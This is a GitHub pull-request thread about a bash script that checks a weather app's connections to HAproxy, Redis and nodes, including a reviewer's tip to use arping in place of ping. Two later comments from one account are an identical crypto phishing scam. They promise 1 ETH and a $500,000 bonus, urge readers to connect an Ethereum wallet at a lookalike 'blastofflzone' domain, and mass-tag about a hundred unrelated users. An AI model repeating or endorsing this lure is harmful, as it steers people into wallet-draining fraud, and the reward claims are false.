### PR TITLE
[New Feature]: Application connection check

### PR DESCRIPTION
**Pull request by Amirali-Salari**
This feature allows the user to make sure the connection of the weather application to external services such as (HAproxy, Redis, nodes) easily and only by running a bash script after running all the containers.

### CODE REVIEW

**Comment by amixsty** [comment]
Thanks AmirAli for your contributing. I test your script and it takes 40 second to run. I replace arping instead of ping and it takes only 6 second. Also in this scenario we don't need a log file and we just print the output. I fix them [here](https://github.com/amixsty/cangrow_weatherapp/pull/2).

**Comment by Amirali-Salari** [comment]
> Thanks AmirAli for your contributing. I test your script and it takes 40 second to run. I replace arping instead of ping and it takes only 6 second. Also in this scenario we don't need a log file and we just print the output. I fix them [here](https://github.com/amixsty/cangrow_weatherapp/pull/2).

**it looks great!**
When even one service is down, ping takes a long time and **arping is a great alternative**.
**Thank you** so much for this tip!

**Comment by jorge-nascimento** [comment]
[Banner](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500,000 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this chance before it's too late!
hikaman, @22388o, @chm0815, @furiousxk, @vijay12panwar, @tutukun, @ashkanjalaliQ, @fossadmin, @makevoid, @mygitorzel, @dewback, @JesJehle, @BalogunMalikO, @antofliberty, @alant, @XOP-EHOTOB, @JustDoItBz, @arjkashyap, @rishi256, @davidlj95, @Astrnx, @Nitrino, @orenfromberg, @maryam-deriv, @dsresearch, @josh-gio, @MasoumiSaeed, @jasper-fu, @Alan2488, @EvannaZhang, @Y-Xiang-hub, @willpiers, @joshuamonroe, @webdiverblue, @mohammadhakim73, @jasonbrown17, @genme, @Thiseames, @n0dez, @avishkarabhishek786, @eyal352, @matrix75, @kilianmh, @Jagrutiti, @lyfsn, @amirdadipoor, @sepid91, @sandipndev, @andatoshiki, @saiedyhossain

**Comment by jorge-nascimento** [comment]
[Banner](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500,000 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this chance before it's too late!
marqzman, @Yenle9, @coryl, @bahachammakhi, @0x00anonG, @Andrew-A-A, @nvxtien, @ltola, @chronic-underclocking, @holybao, @jmnwong, @denylsonmelo, @SFzxc, @soy-sauce-rice, @daslater, @nziyouren, @FractalEncrypt, @georgesims21, @zph, @surya2252, @raihankhan-rk, @Luo-Chang, @twitteried, @rqp5013, @omortie, @Big-Aaron, @nawazdhandala, @NimbleNitesh, @shortdaddy0711, @natewoods-wf, @a-god-of-death, @marryton007, @Vimalraj571, @mgagliardo, @danmarinescu, @kennyadsl, @sebasjm, @MrHash, @shriharipandit, @kpbaks, @abbucomms, @chriott, @robot-visions, @starcharles, @ssi-hu-gabriella-csuka, @1OneOneOneOne1, @StellarStoic, @szon0111, @joeuelk, @sourcewire

**Pull request merged**
